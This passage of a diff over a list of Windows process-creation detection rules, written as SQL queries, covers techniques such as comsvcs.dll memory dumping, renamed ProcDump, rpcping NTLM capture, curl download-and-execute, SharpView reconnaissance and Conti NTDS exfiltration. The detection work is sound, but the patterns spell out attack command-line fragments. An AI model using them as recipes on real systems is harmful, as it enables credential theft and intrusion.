- "title": "Suspicious Double Extension File Execution", - "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", - "status": "stable", - "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", - "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Registration via cscript.exe", + "id": "28c8f68b-098d-45af-8d43-8089f3e35403", + "status": "experimental", + "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%.doc.exe' ESCAPE '\\' OR NewProcessName LIKE '%.docx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xls.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.txt.exe' ESCAPE '\\' OR NewProcessName LIKE '% .exe' ESCAPE '\\' OR NewProcessName LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR NewProcessName LIKE '%.doc.js' ESCAPE '\\' OR NewProcessName LIKE '%.docx.js' ESCAPE '\\' OR NewProcessName LIKE '%.xls.js' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.js' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.js' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.js' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.js' ESCAPE '\\' OR NewProcessName LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.22000.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.19041.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.17763.0\\\\x64%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_double_extension.yml" + "filename": "proc_creation_win_regsvr32_registration_via_cscript.yml" }, { - "title": "Command Line Execution with Suspicious URL and AppData Strings", - "id": "1ac8666b-046f-4201-8aba-1951aaec03a3", - "status": "test", - "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", - "tags": [ - "attack.execution", - "attack.command_and_control", - "attack.t1059.003", - "attack.t1059.001", - "attack.t1105" + "title": "Suspicious Usage Of ShellExec_RunDLL", + "id": "d87bd452-6da1-456e-8155-7dc988157b7d", + "status": "experimental", + "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" ], "falsepositives": [ - "High" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\' AND CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_http_appdata.yml" + "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" }, { - "title": "Audio Capture via PowerShell", - "id": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", + "title": "Capture Credentials with Rpcping.exe", + "id": "93671f99-04eb-4ab4-a161-70d446a84003", "status": "test", - "description": "Detects audio capture via PowerShell Cmdlet.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.collection", - "attack.t1123" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Legitimate audio capture by legitimate user." + "Unlikely" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%WindowsAudioDevice-Powershell-Cmdlet%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rpcping.exe' ESCAPE '\\' AND (CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/s%' ESCAPE '\\')) AND ((CommandLine LIKE '%-u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%/u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%-t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\') OR (CommandLine LIKE '%/t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_audio_capture.yml" + "filename": "proc_creation_win_rpcping_credential_capture.yml" }, { - "title": "Potential Product Reconnaissance Via Wmic.EXE", - "id": "15434e33-5027-4914-88d5-3d4145ec25a9", - "status": "experimental", - "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", - "author": "Nasreddine Bencherchali", + "title": "Hiding Files with Attrib.exe", + "id": "4281cb20-2994-4580-aa63-c8b86d019934", + "status": "test", + "description": "Detects usage of attrib.exe to hide files from users.", + "author": "Sami Ruohonen", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ - "Unknown" + "IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)", + "Msiexec.exe hiding desktop.ini" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%Product%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +h %' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\desktop.ini %' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '+R +H +S +A \\\\\\*.cui' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\\\*.bat' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_product.yml" + "filename": "proc_creation_win_attrib_hiding_files.yml" }, { - "title": "Potential SquiblyTwo Technique Execution", - "id": "8d63dadf-b91b-4187-87b6-34a1114577ea", + "title": "Renamed ProcDump Execution", + "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", "status": "test", - "description": "Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields", - "author": "Markus Neis, Florian Roth", + "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1047", - "attack.t1220", - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Procdump illegaly bundled with legitimate software", + "Administrators who rename binaries (should be investigated)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe' OR Imphash IN ('1B1A3F43BF37B5BFE60751F2EE2F326E', '37777A96245A3C74EB217308F3546F4C', '9D87C9D67CE724033C0B40CC4CA1B206') OR (Hashes LIKE '%IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=37777A96245A3C74EB217308F3546F4C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206%' ESCAPE '\\')) AND (CommandLine LIKE '%format:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_squiblytwo_bypass.yml" + "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" }, { - "title": "Potential Suspicious Activity Using SeCEdit", - "id": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", - "status": "experimental", - "description": "Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy", - "author": "Janantha Marasinghe", + "title": "Dumping Process via Sqldumper.exe", + "id": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", + "status": "test", + "description": "Detects process dump via legitimate sqldumper.exe binary", + "author": "Kirill Kiryanov, oscd.community", "tags": [ - "attack.discovery", - "attack.persistence", - "attack.defense_evasion", "attack.credential_access", - "attack.privilege_escalation", - "attack.t1562.002", - "attack.t1547.001", - "attack.t1505.005", - "attack.t1556.002", - "attack.t1562", - "attack.t1574.007", - "attack.t1564.002", - "attack.t1546.008", - "attack.t1546.007", - "attack.t1547.014", - "attack.t1547.010", - "attack.t1547.002", - "attack.t1557", - "attack.t1082" + "attack.t1003.001" ], "falsepositives": [ - "Legitimate administrative use" + "Legitimate MSSQL Server actions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\secedit.exe' ESCAPE '\\' OR OriginalFileName = 'SeCEdit') AND ((CommandLine LIKE '%/export%' ESCAPE '\\' AND CommandLine LIKE '%/cfg%' ESCAPE '\\') OR (CommandLine LIKE '%/configure%' ESCAPE '\\' AND CommandLine LIKE '%/db%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sqldumper.exe' ESCAPE '\\' AND (CommandLine LIKE '%0x0110%' ESCAPE '\\' OR CommandLine LIKE '%0x01100:40%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_secedit_execution.yml" + "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features", - "id": "a383dec4-deec-4e6e-913b-ed9249670848", - "status": "experimental", - "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Run Once Task Execution as Configured in Registry", + "id": "198effb6-6c98-4d0c-9ea3-451fa143c45c", + "status": "test", + "description": "This rule detects the execution of Run Once task as configured in the registry", + "author": "Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR Description = 'Run Once Wrapper') AND (CommandLine LIKE '%/AlternateShellStartup%' ESCAPE '\\' OR CommandLine LIKE '%/r' ESCAPE '\\'))" ], - "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" + "filename": "proc_creation_win_runonce_execution.yml" }, { - "title": "Suspicious Regsvr32 Execution With Image Extension", - "id": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", + "title": "HackTool - SharpView Execution", + "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", "status": "experimental", - "description": "Detects the execution of REGSVR32.exe with DLL files masquerading as image files", + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.discovery", + "attack.t1049", + "attack.t1069.002", + "attack.t1482", + "attack.t1135", + "attack.t1033" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND (CommandLine LIKE '%.bmp' ESCAPE '\\' OR CommandLine LIKE '%.cr2' ESCAPE '\\' OR CommandLine LIKE '%.eps' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.ico' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.nef' ESCAPE '\\' OR CommandLine LIKE '%.orf' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.raw' ESCAPE '\\' OR CommandLine LIKE '%.sr2' ESCAPE '\\' OR CommandLine LIKE '%.tif' ESCAPE '\\' OR CommandLine LIKE '%.tiff' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'SharpView.exe' OR NewProcessName LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regsvr32_image.yml" + "filename": "proc_creation_win_hktl_sharpview.yml" }, { - "title": "Use Short Name Path in Command Line", - "id": "349d891d-fef0-4fe4-bc53-eee623a15969", + "title": "Gpscript Execution", + "id": "1e59c230-6670-45bf-83b0-98903780607e", "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1218" ], "falsepositives": [ - "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process." + "Legitimate uses of logon scripts distributed via group policy" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%~1\\\\%' ESCAPE '\\' OR CommandLine LIKE '%~2\\\\%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\GPSoftware\\\\Directory Opus\\\\dopus.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\veam.backup.shell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Everything\\\\Everything.exe' ESCAPE '\\') OR ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%\\\\appdata\\\\local\\\\webex\\\\webex64\\\\meetings\\\\wbxreport.exe%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\cmd\\\\scalar.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gpscript.exe' ESCAPE '\\' OR OriginalFileName = 'GPSCRIPT.EXE') AND (CommandLine LIKE '% /logon%' ESCAPE '\\' OR CommandLine LIKE '% /startup%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_ntfs_short_name_path_use_cli.yml" + "filename": "proc_creation_win_lolbin_gpscript.yml" }, { - "title": "Query Usage To Exfil Data", - "id": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", - "status": "experimental", - "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Sdclt Child Processes", + "id": "da2738f2-fadb-4394-afa7-0a0674885afa", + "status": "test", + "description": "A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\query.exe' ESCAPE '\\' AND (CommandLine LIKE '%session >%' ESCAPE '\\' OR CommandLine LIKE '%process >%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sdclt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_query_session_exfil.yml" + "filename": "proc_creation_win_sdclt_child_process.yml" }, { - "title": "Curl Download And Execute Combination", - "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", - "status": "test", - "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", - "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", + "title": "Process Reconnaissance Via Wmic.EXE", + "id": "221b251a-357a-49a9-920a-271802777cc0", + "status": "experimental", + "description": "Detects the execution of \"wmic\" with the \"process\" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.", + "author": "frack113", "tags": [ "attack.execution", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%process%' ESCAPE '\\') AND NOT (CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" + "filename": "proc_creation_win_wmic_recon_process.yml" }, { - "title": "Conti NTDS Exfiltration Command", - "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", + "title": "Process Dumping Via Comsvcs.DLL", + "id": "646ea171-dded-4578-8a4d-65e9822892e3", "status": "test", - "description": "Detects a command used by conti to exfiltrate NTDS", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", + "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560" + "attack.defense_evasion", + "attack.credential_access", + "attack.t1036", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Unlikely, because no one should dump the process memory in that way" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" ], - "filename": 